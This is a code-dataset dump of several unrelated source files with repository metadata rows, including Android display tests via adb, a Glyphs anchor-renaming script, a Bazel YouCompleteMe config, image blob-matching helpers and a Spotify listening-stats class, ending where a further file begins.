dumpsys_hight = int(size_list[0].strip())
return dumpsys_hight
else:
assert len(size_list) > 0, "[FAILURE] dumpsys high is %s" % size_list
def get_dumpsys_width(self):
dumpsys_size = self.__get_dumpsys_size()
size_list = dumpsys_size.split(" ")
if len(size_list) > 0:
dumpsys_width = int(size_list[2].strip())
return dumpsys_width
else:
assert len(size_list) > 0, "[FAILURE] dumpsys width is %s" % size_list
def __get_size(self):
"""
run commands 'adb shell wm size ' to get real size
"""
output = g_common_obj.adb_cmd_capture_msg(repr(self.GET_SIZE))
m = re.search(r'Physical size:\s*\w+x\w+', output)
size = m.group().split(":")[1].strip()
return size
def get_hight(self):
size = self.__get_size()
size_list = size.split("x")
if len(size_list) > 0:
height = int(size_list[0])
return height
else:
assert len(size_list) > 0, "[FAILURE] size list is %s" % size_list
def get_width(self):
size = self.__get_size()
size_list = size.split("x")
if len(size_list) > 0:
width = int(size_list[1])
return width
else:
assert len(size_list) > 0, "[FAILURE] size list is %s" % size_list
def compare_dumpsys_size_with_real_size(self):
"""
compare dumpsys size with real size
"""
dumpsys_hight = self.get_dumpsys_hight()
hight = self.get_hight()
dumpsys_width = self.get_dumpsys_width()
width = self.get_width()
print("[Debug] dumpsys_hight is %s,real height is %s" % (dumpsys_hight, hight))
print("[Debug] dumpsys_width is %s,real width is %s" % (dumpsys_width, width))
assert dumpsys_hight == hight and dumpsys_hight >= 600, \
"[FAILURE] dumpsys hight is not equal to real hight:dumpsys hight is %d,real hight is %d"\
% (dumpsys_hight, hight)
assert dumpsys_width == width and dumpsys_width >= 600, \
"[FAILURE] dumpsys width is not equal to real width:dumpsys width is %d,real width is %d"\
% (dumpsys_width, width)
def compare_dumpsys_density_with_real_density(self):
"""
compare dumpsys density with real density
"""
dumpsys_density = window_info.get_dumpsys_density()
density = window_info.get_wm_density()
print("[Debug] dumpsys_density is %s,real density is %s" % (dumpsys_density, density))
assert dumpsys_density == density and dumpsys_density > 0, \
"[FAILURE] dumpsys density is not equal to real density:dumpsys density is %d,real density is %d"\
% (dumpsys_density, density)
def judge_density_in_range(self):
"""
        judge if dumpsys density is in [120,160,213,240,280,320,360,400,420,480,560,640]
"""
dumpsys_density = window_info.get_dumpsys_density()
print("[Debug] dumpsys_density is %s,density range is %s" % (dumpsys_density, self.density_range))
for i in range(0, int(len(self.density_range))):
if dumpsys_density == int(self.density_range[i]):
self.flag = True
break
assert self.flag, \
"[FAILURE] dumpsys_density is not in density_range, dumpsys_density is %d" % dumpsys_density
def judge_dpi(self):
"""
judge if dumpsys density is closest to the dumpsys dpi,171.235 x 439.351 dpi
"""
min = 0
closest_density = 0
dumpsys_dpi = window_info.get_dumpsys_dpi()
dumpsys_dpi_x = float(dumpsys_dpi.split(" ")[0].strip())
dumpsys_dpi_y = float(dumpsys_dpi.split(" ")[2].strip())
dumpsys_hight = self.get_dumpsys_hight()
dumpsys_width = self.get_dumpsys_width()
denominator = math.sqrt((dumpsys_hight / dumpsys_dpi_x) ** 2 + (dumpsys_width / dumpsys_dpi_y) ** 2)
numerator = math.sqrt(dumpsys_hight ** 2 + dumpsys_width ** 2)
dumpsys_dpi = numerator / denominator
print("dumpsys_dpi is %s" % dumpsys_dpi)
dumpsys_density = window_info.get_dumpsys_density()
for i in range(0, len(self.density_range)):
if i == 0:
min = abs(dumpsys_dpi - self.density_range[i])
tmp = abs(dumpsys_dpi - self.density_range[i])
if tmp <= min:
min = tmp
closest_density = self.density_range[i]
print("[Debug] closest density is %s" % (closest_density))
assert closest_density == dumpsys_density, \
"[FAILURE]the dumpsys_density is not the closest to dumpsys dpi,the closest density is %s )"\
% closest_density
def compare_refresh_rate(self):
msg = g_common_obj.adb_cmd_capture_msg(repr(self.DUMPSYS_CMD))
m = re.search(r'\d+.\d+\s*fps', msg)
if m is not None:
refresh_rate = float(m.group().strip().split(" ")[0])
diff = abs(refresh_rate - 60)
print("[Debug] diff is %s" % diff)
assert diff < 1, "[FAILURE] The value of string freshRate is %s ,greater(less) than 60." % refresh_rate
def check_display(self):
output = g_common_obj.adb_cmd_capture_msg("dumpsys window | grep mScreenOn")
assert output.find("mScreenOnFully=false") != -1, "[FAILURE] Display is still on after time-out."
print("[Debug] screen status is %s" % output)
time.sleep(1)
out = g_common_obj.adb_cmd_capture_msg("dumpsys display |grep mActualBacklight")
if out is not None:
actualBacklight = int(out.split("=")[1])
print("[Debug] actual back light is %s" % actualBacklight)
assert actualBacklight == 0, "[FAILURE] Device backlight not dim out after time-out."
def calculate_screen_aspect_ratio(self):
width = window_info.get_wm_width()
hight = window_info.get_wm_hight()
if width > hight:
ratio = float(width) / hight
else:
ratio = float(hight) / width
        assert ratio > 1.3333 and ratio < 1.86,\
            "[FAILURE] The screen ratio is not right, it should be between 1.3333 and 1.86, but now it is %s" % ratio
def check_color_depth(self):
output = g_common_obj.adb_cmd_capture_msg("dumpsys SurfaceFlinger | grep 'FB TARGET'")
print("[Debug] FB TARGET is %s" % output)
assert output.find("8888") != -1, "[FAILURE] The format of this layer is not BGRA_8888."
d_metricsreport_impl = DisplayMetricsReportImpl()
| 41.550505
| 115
| 0.629999
| 7,437
| 0.903975
| 0
| 0
| 0
| 0
| 0
| 0
| 2,678
| 0.325514
|
91f92403a6d2b5956cbf468fe884187f6c555b2a
| 3,811
|
py
|
Python
|
Anchors/Find and Replace in Anchor Names.py
|
juandelperal/Glyphs-Scripts
|
1f3cb71683ec044dff67a46cd895773e8271effa
|
[
"Apache-2.0"
] | null | null | null |
Anchors/Find and Replace in Anchor Names.py
|
juandelperal/Glyphs-Scripts
|
1f3cb71683ec044dff67a46cd895773e8271effa
|
[
"Apache-2.0"
] | null | null | null |
Anchors/Find and Replace in Anchor Names.py
|
juandelperal/Glyphs-Scripts
|
1f3cb71683ec044dff67a46cd895773e8271effa
|
[
"Apache-2.0"
] | null | null | null |
#MenuTitle: Find And Replace In Anchor Names
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
from builtins import str
__doc__="""
Replaces strings in anchor names of all selected glyphs.
"""
import vanilla
class SearchAndReplaceInAnchorNames( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 520
windowHeight = 58
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"Search And Replace In Anchor Names", # window title
minSize = ( windowWidth, windowHeight ), # minimum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow" # stores last window position and size
)
# UI elements:
self.w.textSearch = vanilla.TextBox((15, 12+2, 67, 14), "Search for:", sizeStyle='small')
self.w.searchFor = vanilla.EditText((15+67, 12, 135, 19), "tip", sizeStyle='small')
self.w.textReplace = vanilla.TextBox((225, 12+2, 67, 14), "Replace by:", sizeStyle='small')
self.w.replaceBy = vanilla.EditText((225+67, 12, 135, 19), "top", sizeStyle='small')
self.w.replaceButton = vanilla.Button((-80, 12+1, -15, 17), "Replace", sizeStyle='small', callback=self.SearchAndReplaceInAnchorNamesMain)
self.w.setDefaultButton( self.w.replaceButton )
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Search And Replace In Anchor Names' could not load preferences. Will resort to defaults")
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def SavePreferences( self, sender ):
try:
Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] = self.w.searchFor.get()
Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] = self.w.replaceBy.get()
except:
return False
return True
def LoadPreferences( self ):
try:
self.w.searchFor.set( Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] )
self.w.replaceBy.set( Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] )
except:
return False
return True
def SearchAndReplaceInAnchorNamesMain( self, sender ):
try:
searchString = self.w.searchFor.get()
replaceString = self.w.replaceBy.get()
thisFont = Glyphs.font # frontmost font
listOfSelectedLayers = thisFont.selectedLayers # active layers of currently selected glyphs
for thisLayer in listOfSelectedLayers: # loop through layers
thisGlyph = thisLayer.parent
reportString = "Anchors renamed in %s:" % thisGlyph.name
displayReportString = False
for thisGlyphLayer in thisGlyph.layers:
for thisAnchor in thisGlyphLayer.anchors:
oldAnchorName = thisAnchor.name
newAnchorName = oldAnchorName.replace( searchString, replaceString )
if oldAnchorName != newAnchorName:
thisAnchor.setName_( newAnchorName )
reportString += "\n layer '%s': %s > %s" % ( thisGlyphLayer.name, oldAnchorName, newAnchorName )
displayReportString = True
if displayReportString:
print(reportString)
if not self.SavePreferences( self ):
print("Note: 'Search And Replace In Anchor Names' could not write preferences.")
self.w.close() # delete if you want window to stay open
except Exception as e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print("Search And Replace In Anchor Names Error: %s" % e)
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
SearchAndReplaceInAnchorNames()
| 37.732673
| 140
| 0.724482
| 3,432
| 0.900551
| 0
| 0
| 0
| 0
| 0
| 0
| 1,291
| 0.338756
|
91fa4adf813afeff4ee8cff082ebb2bd99d4723f
| 269
|
py
|
Python
|
Python3/Coursera/003_quadratic_roots/solution.py
|
neon1ks/Study
|
5d40171cf3bf5e8d3a95539e91f5afec54d1daf3
|
[
"MIT"
] | null | null | null |
Python3/Coursera/003_quadratic_roots/solution.py
|
neon1ks/Study
|
5d40171cf3bf5e8d3a95539e91f5afec54d1daf3
|
[
"MIT"
] | null | null | null |
Python3/Coursera/003_quadratic_roots/solution.py
|
neon1ks/Study
|
5d40171cf3bf5e8d3a95539e91f5afec54d1daf3
|
[
"MIT"
] | null | null | null |
import sys
import math
if __name__ == '__main__':
a = int(sys.argv[1])
b = int(sys.argv[2])
c = int(sys.argv[3])
d = b * b - 4 * a * c
x1 = (-b + math.sqrt(d)) / (2 * a)
x2 = (-b - math.sqrt(d)) / (2 * a)
print(int(x1))
print(int(x2))
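# Worked check (added for clarity): for a=1, b=-3, c=2 the discriminant is 1, so the script
# prints 2 and 1. Note that math.sqrt(d) raises ValueError when d < 0, so real roots are assumed.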
| 19.214286
| 38
| 0.472119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.037175
|
91fb5d86e0a2ace17209d7b5be31f349a8d3fe5f
| 2,258
|
py
|
Python
|
bigstream/features.py
|
wangyuhan01/bigstream
|
3cd2e4b217639d09b5e2dd0e169a7c210d9cacef
|
[
"MIT"
] | 14
|
2021-03-10T12:52:02.000Z
|
2022-03-14T19:46:03.000Z
|
bigstream/features.py
|
wangyuhan01/bigstream
|
3cd2e4b217639d09b5e2dd0e169a7c210d9cacef
|
[
"MIT"
] | 6
|
2021-02-24T18:15:34.000Z
|
2021-12-08T16:58:06.000Z
|
bigstream/features.py
|
wangyuhan01/bigstream
|
3cd2e4b217639d09b5e2dd0e169a7c210d9cacef
|
[
"MIT"
] | 6
|
2021-01-20T03:57:14.000Z
|
2022-02-04T22:16:46.000Z
|
import numpy as np
from fishspot.filter import white_tophat
from fishspot.detect import detect_spots_log
def blob_detection(
image,
min_blob_radius,
max_blob_radius,
**kwargs,
):
    """Detect blobs with a white tophat filter followed by LoG spot detection; returns an (N, 4) array of spot coordinates and their image intensities."""
wth = white_tophat(image, max_blob_radius)
spots = detect_spots_log(
wth,
min_blob_radius,
max_blob_radius,
**kwargs,
).astype(int)
intensities = image[spots[:, 0], spots[:, 1], spots[:, 2]]
return np.hstack((spots[:, :3], intensities[..., None]))
def get_spot_context(image, spots, vox, radius):
    """Return [spot, window] pairs: each window is the image patch of the given radius around the spot, whose physical position is divided by vox to get voxel indices."""
output = []
for spot in spots:
s = (spot/vox).astype(int)
w = image[s[0]-radius:s[0]+radius+1,
s[1]-radius:s[1]+radius+1,
s[2]-radius:s[2]+radius+1]
output.append( [spot, w] )
return output
def _stats(arr):
    """Return the per-row mean and standard deviation of arr."""
# compute mean and standard deviation along columns
arr = arr.astype(np.float64)
means = np.mean(arr, axis=1)
sqr_means = np.mean(np.square(arr), axis=1)
stddevs = np.sqrt( sqr_means - np.square(means) )
return means, stddevs
def pairwise_correlation(A, B):
    """Return the matrix of Pearson correlations between every flattened context window in A and every window in B."""
# grab and flatten context
a_con = np.array( [a[1].flatten() for a in A] )
b_con = np.array( [b[1].flatten() for b in B] )
# get means and std for all contexts, center contexts
a_mean, a_std = _stats(a_con)
b_mean, b_std = _stats(b_con)
a_con = a_con - a_mean[..., None]
b_con = b_con - b_mean[..., None]
# compute pairwise correlations
corr = np.matmul(a_con, b_con.T)
corr = corr / a_std[..., None]
corr = corr / b_std[None, ...]
corr = corr / a_con.shape[1]
# contexts with no variability are nan, set to 0
corr[np.isnan(corr)] = 0
return corr
def match_points(A, B, scores, threshold):
    """Return corresponding positions from A and B, keeping each spot in A whose best-scoring match in B exceeds threshold."""
# split positions from context
a_pos = np.array( [a[0] for a in A] )
b_pos = np.array( [b[0] for b in B] )
# get highest scores above threshold
best_indcs = np.argmax(scores, axis=1)
a_indcs = range(len(a_pos))
keeps = scores[(a_indcs, best_indcs)] > threshold
# return positions of corresponding points
return a_pos[keeps, :3], b_pos[best_indcs[keeps], :3]
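# --- Illustrative flow sketch (added for clarity; not part of the original module, and the
# variable names are placeholders) ---
# Typical use of the helpers above:
#   fix_spots = blob_detection(fix_image, min_blob_radius=2, max_blob_radius=6)
#   mov_spots = blob_detection(mov_image, min_blob_radius=2, max_blob_radius=6)
#   a = get_spot_context(fix_image, fix_spots[:, :3], vox=fix_spacing, radius=8)
#   b = get_spot_context(mov_image, mov_spots[:, :3], vox=mov_spacing, radius=8)
#   scores = pairwise_correlation(a, b)
#   fix_pts, mov_pts = match_points(a, b, scores, threshold=0.6)
# --- end of illustrative sketch ---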
| 24.27957
| 62
| 0.59566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 372
| 0.164748
|
91fc1d22637f7a669f85b81d4edd4e86d5957148
| 8,736
|
py
|
Python
|
.ycm_extra_conf.py
|
zaucy/bazel-compilation-database
|
aa58494efdf31c3e3525832b3d44d48bb3bc2b0b
|
[
"Apache-2.0"
] | 1
|
2021-04-23T03:47:31.000Z
|
2021-04-23T03:47:31.000Z
|
.ycm_extra_conf.py
|
tsingakbar/bazel-compilation-database
|
a1d592dd8c3423c7fe94933ead4f098353ad4436
|
[
"Apache-2.0"
] | null | null | null |
.ycm_extra_conf.py
|
tsingakbar/bazel-compilation-database
|
a1d592dd8c3423c7fe94933ead4f098353ad4436
|
[
"Apache-2.0"
] | 1
|
2020-11-14T00:11:51.000Z
|
2020-11-14T00:11:51.000Z
|
#!/usr/bin/python
# Copyright 2018 GRAIL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration file for YouCompleteMe to fetch C++ compilation flags from
Bazel.
See https://github.com/ycm-core/YouCompleteMe#c-family-semantic-completion for
how YCM works. In that section:
For Option 1 (compilation database), use the generate.sh script in this
repository.
For Option 2 (.ycm_extra_conf.py), symlink this file to the root of your
workspace and bazel's output_base, or set it as your global config.
"""
from __future__ import print_function
import json
import os
import re
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ElementTree
_BAZEL = os.getenv("BAZEL_COMPDB_BAZEL_PATH") or "bazel"
def bazel_info():
"""Returns a dict containing key values from bazel info."""
bazel_info_dict = dict()
try:
out = subprocess.check_output([_BAZEL, 'info']).decode('utf-8').strip().split('\n')
except subprocess.CalledProcessError as err:
# This exit code is returned when this command is run outside of a bazel workspace.
if err.returncode == 2:
sys.exit(0)
for line in out:
key_val = line.strip().partition(": ")
bazel_info_dict[key_val[0]] = key_val[2]
return bazel_info_dict
def bazel_query(args):
"""Executes bazel query with the given args and returns the output."""
# TODO: switch to cquery when it supports siblings and less crash-y with external repos.
query_cmd = [_BAZEL, 'query'] + args
proc = subprocess.Popen(query_cmd, stdout=subprocess.PIPE)
return proc.communicate()[0].decode('utf-8')
def file_to_target(filepath):
"""Returns a string that works as a bazel target specification for the given file."""
if not filepath.startswith("external/"):
# The file path relative to repo root works for genfiles and binfiles too.
return filepath
# For external repos, we have to find the owner package manually.
repo_prefix = re.sub('external/([^/]*).*', '@\\1//', filepath)
filepath = re.sub('external/[^/]*/', '', filepath)
# Find out which package is the owner of this file.
query_result = bazel_query(['-k', repo_prefix+'...', '--output=package'])
packages = [package.strip() for package in query_result.split('\n')]
owner = ""
for package in packages:
package = package[len(repo_prefix):]
if filepath.startswith(package) and len(package) > len(owner):
owner = package
return repo_prefix + owner + ":" + os.path.relpath(filepath, owner)
def standardize_file_target(file_target):
"""For file targets that are not source files, return the target that generated them.
This is needed because rdeps of generated files do not include targets that reference
their generating rules.
https://github.com/bazelbuild/bazel/issues/4949
"""
query_result = bazel_query(['--output=xml', file_target])
if not query_result:
sys.exit("Empty query response for {}. It is probably not handled by bazel".format(file_target))
target_xml = ElementTree.fromstringlist(query_result.split('\n'))
source_element = target_xml.find('source-file')
if source_element is not None:
return file_target
generated_element = target_xml.find('generated-file')
if generated_element is not None:
return generated_element.get('generating-rule')
sys.exit("Error parsing query xml for " + file_target + ":\n" + query_result)
def get_aspects_filepath(label, bazel_bin):
"""Gets the file path for the generated aspects file that contains the
compile commands json entries.
"""
target_path = re.sub(':', '/', label)
target_path = re.sub('^@(.*)//', 'external/\\1/', target_path)
target_path = re.sub('^/*', '', target_path)
relative_file_path = target_path + '.compile_commands.json'
return os.path.join(bazel_bin, *relative_file_path.split('/'))
def get_compdb_json(aspects_filepath, bazel_exec_root):
"""Returns the JSON string read from the file after necessary processing."""
compdb_json_str = "[\n"
with open(aspects_filepath, 'r') as aspects_file:
compdb_json_str += aspects_file.read()
compdb_json_str += "\n]"
return re.sub('__EXEC_ROOT__', bazel_exec_root, compdb_json_str)
def get_flags(filepath, compdb_json_str):
"""Gets the compile command flags from the compile command for the file."""
compdb_dict = json.loads(compdb_json_str)
for entry in compdb_dict:
if entry['file'] != filepath:
continue
command = entry['command']
return shlex.split(command)[1:]
# This could imply we are fetching the wrong compile_commands.json or there
# is a bug in aspects.bzl.
sys.exit("File {f} not present in the compilation database".format(f=filepath))
def standardize_flags(flags, bazel_workspace):
"""Modifies flags obtained from the compile command for compilation outside of bazel."""
# We need to add the workspace directly because the files symlinked in the
# execroot during a build disappear after a different build action.
flags.extend(['-iquote', bazel_workspace])
return flags
def cfamily_settings(filename):
"""Returns C-family settings as a dict with at least a 'flags' key that
points to an array of strings as flags.
"""
bazel_info_dict = bazel_info()
bazel_bin = bazel_info_dict['bazel-bin']
bazel_genfiles = bazel_info_dict['bazel-genfiles']
bazel_exec_root = bazel_info_dict['execution_root']
bazel_workspace = bazel_info_dict['workspace']
os.chdir(bazel_workspace)
# Valid prefixes for the file, in decreasing order of specificity.
file_prefix = [p for p in [bazel_genfiles, bazel_bin, bazel_exec_root, bazel_workspace]
if filename.startswith(p)]
if not file_prefix:
sys.exit("Not a valid file: " + filename)
filepath = os.path.relpath(filename, file_prefix[0])
file_target = standardize_file_target(file_to_target(filepath))
# File path relative to execroot, as it will appear in the compile command.
if file_prefix[0].startswith(bazel_exec_root):
filepath = os.path.relpath(filename, bazel_exec_root)
cc_rules = "cc_(library|binary|test|inc_library|proto_library)"
query_result = bazel_query([('kind("{cc_rules}", rdeps(siblings({f}), {f}, 1))'
.format(f=file_target, cc_rules=cc_rules)), '--keep_going'])
labels = [label.partition(" ")[0] for label in query_result.split('\n') if label]
if not labels:
sys.exit("No cc rules depend on this source file.")
repository_override = '--override_repository=bazel_compdb=' + os.path.dirname(
os.path.realpath(__file__))
aspect_definition = '--aspects=@bazel_compdb//:aspects.bzl%compilation_database_aspect'
bazel_aspects = [
_BAZEL,
'build',
aspect_definition,
repository_override,
'--output_groups=compdb_files,header_files',
] + labels
proc = subprocess.Popen(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
errors = [e for e in out.splitlines() + err.splitlines()
if e.startswith("ERROR:")]
if errors:
raise Exception('/'.join(errors))
else:
raise Exception(err)
aspects_filepath = get_aspects_filepath(labels[0], bazel_bin)
compdb_json = get_compdb_json(aspects_filepath, bazel_exec_root)
flags = standardize_flags(get_flags(filepath, compdb_json), bazel_workspace)
return {
'flags': flags,
'include_paths_relative_to_dir': bazel_exec_root,
}
#pylint: disable=C0103
def Settings(**kwargs):
"""Function that is called by YCM with language and filename arguments,
and expects a dict of language-specific settings.
"""
if kwargs['language'] == 'cfamily':
return cfamily_settings(kwargs['filename'])
return {}
# For testing; needs exactly one argument as path of file.
if __name__ == '__main__':
filename = os.path.abspath(sys.argv[1])
print(Settings(language='cfamily', filename=filename))
| 37.333333
| 104
| 0.694254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,894
| 0.445742
|
91fc55bd294641a3405ae46e672d73216e1f79e0
| 450
|
py
|
Python
|
djasana/migrations/0007_alter_task_completed.py
|
dosoulwork/django-asana
|
05c63cc6a375783f84bb82821800ca419db9fa85
|
[
"MIT"
] | 10
|
2017-04-25T20:20:14.000Z
|
2021-02-26T18:57:59.000Z
|
djasana/migrations/0007_alter_task_completed.py
|
dosoulwork/django-asana
|
05c63cc6a375783f84bb82821800ca419db9fa85
|
[
"MIT"
] | 19
|
2018-08-09T20:45:51.000Z
|
2021-11-29T17:47:21.000Z
|
djasana/migrations/0007_alter_task_completed.py
|
dosoulwork/django-asana
|
05c63cc6a375783f84bb82821800ca419db9fa85
|
[
"MIT"
] | 8
|
2018-06-28T02:54:06.000Z
|
2020-02-23T13:34:46.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 17:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djasana', '0006_adds_defaults'),
]
operations = [
migrations.AlterField(
model_name='task',
name='completed_at',
field=models.DateTimeField(null=True),
),
]
| 21.428571
| 50
| 0.615556
| 292
| 0.648889
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.266667
|
91fc8f01eba61ef1ef5ef0f60b821056938bce1a
| 6,375
|
py
|
Python
|
src/StatifyStats.py
|
beng92/Statify
|
9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5
|
[
"MIT"
] | 1
|
2016-06-22T07:44:38.000Z
|
2016-06-22T07:44:38.000Z
|
src/StatifyStats.py
|
beng92/Statify
|
9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5
|
[
"MIT"
] | null | null | null |
src/StatifyStats.py
|
beng92/Statify
|
9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5
|
[
"MIT"
] | null | null | null |
'''
x Total plays
x Total artists
x Total unique songs
Average song per artist
x Favourite track
Favourite artist (by plays or time)
Favourite album (req. api)
Average/total/unique plays per range
Average/total/unique artists per range
Average/total time listened per range
Favourite genre (req. api) (by plays or time)
% songs skipped before end (req. api)
Most skipped song/artist (req. api)
Graph of time of day listening
Graph of day of the week listening
Listening habits by Spotify values e.g. accousticness (req. api)
Search listening history
https://developer.spotify.com/web-api/
https://github.com/plamere/spotipy
http://spotipy.readthedocs.org/en/latest/
http://cgbystrom.com/articles/deconstructing-spotifys-builtin-http-server/
https://github.com/cgbystrom/spotify-local-http-api/issues/2
https://github.com/cgbystrom/spotify-local-http-api
http://effbot.org/zone/wcklib-calendar.htm
http://svn.python.org/projects/sandbox/trunk/ttk-gsoc/samples/ttkcalendar.py
'''
import time, datetime, StatifyCache, logging
# Songs read in order (date, Song)
class StatifyStats:
def __init__(self):
self.allSongs = []
self.allItems = []
self.firstdate = None
self.enddate = None
logging.basicConfig(filename="debug.log", filemode='w', level=logging.DEBUG, format='%(asctime)s %(levelname)s > %(message)s', datefmt='%Y/%m/%d %H:%M:%S')
self.length = 0
self.sc = StatifyCache.StatifyCache()
def most_common(self, list):
d = {}
for item in list:
if item in d:
d[item] = d[item] + 1
else:
d[item] = 1
max = 0
name = ""
for item in d:
if d[item] > max:
max = d[item]
name = item
return (name,max)
def most_common_artist_plays(self, list):
return self.most_common([s.artist for d,s in list])
def most_common_artist_link(self, artist):
song = self.sc.getName(artist, "artist")
return song.artisturl if song != None else None
def most_common_song_plays(self, list):
return self.most_common([s.name for d,s in list])
def most_common_song_link(self, song):
song = self.sc.getName(song, "song")
return song.songurl if song != None else None
def listening_time(self, list): # Expecting self.allItems in form (d,s)
timer = datetime.timedelta()
start = None
for d,s in list:
if start == None:
start = d
if s == "Spotify":
end = d
timer = timer + (d - start)
start = None
if start != None:
timer = timer + (datetime.datetime.now() - start)
return timer
def daysInRange(self, list):
startDate = list[0][0]
endDate = list[len(list)-1][0]
return (startDate - endDate).days
def load(self, start, end):
"""Loads the data.txt file created by StatifyTracking.pyw
"""
file = open("data/data.txt")
lines = file.read().splitlines()
file.close()
ret = len(lines) > self.length
self.length = len(lines)
self.allItems = []
self.firstdate = None
for line in lines:
dateLine = line.split('>',1)[0]
date = datetime.datetime.strptime(dateLine, "%a %b %d %H:%M:%S %Y")
if self.firstdate == None:
self.firstdate = date
self.enddate = date
song = line.split('>',1)[1]
index = lines.index(line)
if song != "Spotify" and song != "":
artistName = song.split(" - ",1)[0]
songName = song.split(" - ",1)[1]
songObj = self.sc.getSong(songName, artistName)
self.allItems.append((date, songObj))
elif song == "Spotify":
self.allItems.append((date,"Spotify"))
if start != None and end != None:
self.allItems = [(d,s) for d,s in self.allItems if d >= start and d <= end]
previous = ""
self.allSongs = [(d,s) for d,s in self.allItems if not isinstance(s, str)]
        # remove consecutive repeat plays; iterate over a copy so removal is safe
        for item in list(self.allSongs):
            date, song = item
            if song == previous:
                self.allSongs.remove(item)
            previous = song
return ret
def plays(self):
"""Return total number of plays for the currently loaded list
"""
return str(len(self.allSongs))
def artists(self):
"""Return number of artists in the currently loaded list
"""
return str(len(set([s.artist for d,s in self.allSongs])))
def uniquePlays(self):
"""Return the number of songs in the currently loaded list
"""
return str(len(set([s.name for d,s in self.allSongs])))
def playsPerDay(self):
"""Return the number of songs in the currently loaded list
"""
return abs(int(len(self.allSongs) / self.daysInRange(self.allSongs)))
def mcSong(self):
"""Returns the most common song, with a link to the Spotify page.
"""
name, max = self.most_common_song_plays(self.allSongs)
song = self.sc.getName(name, "song")
return (name + " - " + song.artist + " (" + str(max) + ")", self.most_common_song_link(name))
def mcArtist(self):
"""Returns the most common artist, with a link to the Spotify page.
"""
artist, max = self.most_common_artist_plays(self.allSongs)
return (artist + " (" + str(max) + ")", self.most_common_artist_link(artist))
def listenTime(self):
"""Returns the total listening time for the currently selected range.
"""
result = self.listening_time(self.allItems)
days = int(result.days)
hours = int(result.seconds/3600)
minutes = int(result.seconds/60)-(hours*60)
return str(days) + (" day, " if result.days == 1 else " days, ") + str(hours) + (" hour, " if hours == 1 else " hours, ") + str(minutes) + (" minute " if minutes == 1 else " minutes ")
| 35.814607
| 192
| 0.570824
| 5,287
| 0.829333
| 0
| 0
| 0
| 0
| 0
| 0
| 1,960
| 0.307451
|
91fd994bcee3cd09c51e7f88b4c8df6b65341586
| 861
|
py
|
Python
|
web/src/yasg.py
|
Mikhail-Gorelov/chat_microservice
|
af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19
|
[
"MIT"
] | 1
|
2022-03-26T20:01:55.000Z
|
2022-03-26T20:01:55.000Z
|
web/src/yasg.py
|
Mikhail-Gorelov/chat_microservice
|
af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19
|
[
"MIT"
] | 4
|
2022-01-23T09:22:53.000Z
|
2022-03-26T13:53:36.000Z
|
web/src/yasg.py
|
Mikhail-Gorelov/chat_microservice
|
af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19
|
[
"MIT"
] | 2
|
2022-03-17T19:12:41.000Z
|
2022-03-30T09:58:50.000Z
|
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.urls import path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework import permissions
from rest_framework.authentication import SessionAuthentication
schema_view_param = {
'public': True,
'permission_classes': (permissions.IsAdminUser,),
'url': getattr(settings, 'SWAGGER_URL', None),
'authentication_classes': (SessionAuthentication,),
}
schema_view = get_schema_view(
openapi.Info(
title=settings.MICROSERVICE_TITLE + ' API',
default_version='v1',
description='Microservice description',
),
**schema_view_param,
)
urlpatterns = [
path(
'swagger/', login_required(schema_view.with_ui('swagger', cache_timeout=0)), name='schema-swagger-ui'
),
]
| 28.7
| 109
| 0.738676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.167247
|
91fe1b9a7b1cd81006952efe0654f1a6e2066aa1
| 1,889
|
py
|
Python
|
src/train.py
|
mohamedkeid/feed-forward-style-transfer
|
f7b058d392161018b2988a24dd2f05566da5ac78
|
[
"MIT"
] | 92
|
2017-02-13T22:35:54.000Z
|
2021-04-28T09:56:02.000Z
|
src/train.py
|
mohamedkeid/feed-forward-style-transfer
|
f7b058d392161018b2988a24dd2f05566da5ac78
|
[
"MIT"
] | 4
|
2017-03-05T02:05:05.000Z
|
2019-02-23T17:15:34.000Z
|
src/train.py
|
mohamedkeid/feed-forward-style-transfer
|
f7b058d392161018b2988a24dd2f05566da5ac78
|
[
"MIT"
] | 36
|
2017-02-24T09:35:57.000Z
|
2021-05-21T17:42:03.000Z
|
#!/usr/bin/python
"""
